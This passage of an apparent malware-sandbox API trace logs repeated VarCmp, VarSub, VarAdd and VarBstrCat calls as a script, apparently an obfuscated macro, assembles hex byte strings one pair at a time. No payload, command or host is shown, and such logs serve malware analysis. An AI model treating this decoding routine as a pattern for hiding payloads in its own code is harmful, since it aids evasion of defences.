returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.573] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.573] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.573] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.573] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.573] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.573] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.573] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.574] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.574] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.574] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.574] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.574] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.574] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.574] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.574] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.574] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.575] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.575] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.575] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.575] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.575] VarBstrCat (in: bstrLeft="&He", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.575] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.576] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.576] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.576] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.576] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.576] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.577] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.577] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.577] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.577] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.577] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.577] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.577] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.578] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.578] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.578] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.578] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.579] VarBstrCat (in: bstrLeft="&Hc", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.579] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.579] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.579] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.579] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.579] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.581] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.581] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.581] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.581] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.582] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.582] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.582] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.582] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.582] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.582] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.582] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.583] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.583] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.583] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.583] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.583] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.583] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.583] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.584] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.584] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.584] VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.584] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.584] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.584] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.584] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.584] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.585] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.585] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.585] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.585] VarBstrCat (in: bstrLeft="&H8", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.586] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.586] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.586] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.586] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.587] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.587] VarAdd (in: pvarLeft=0x197a34, 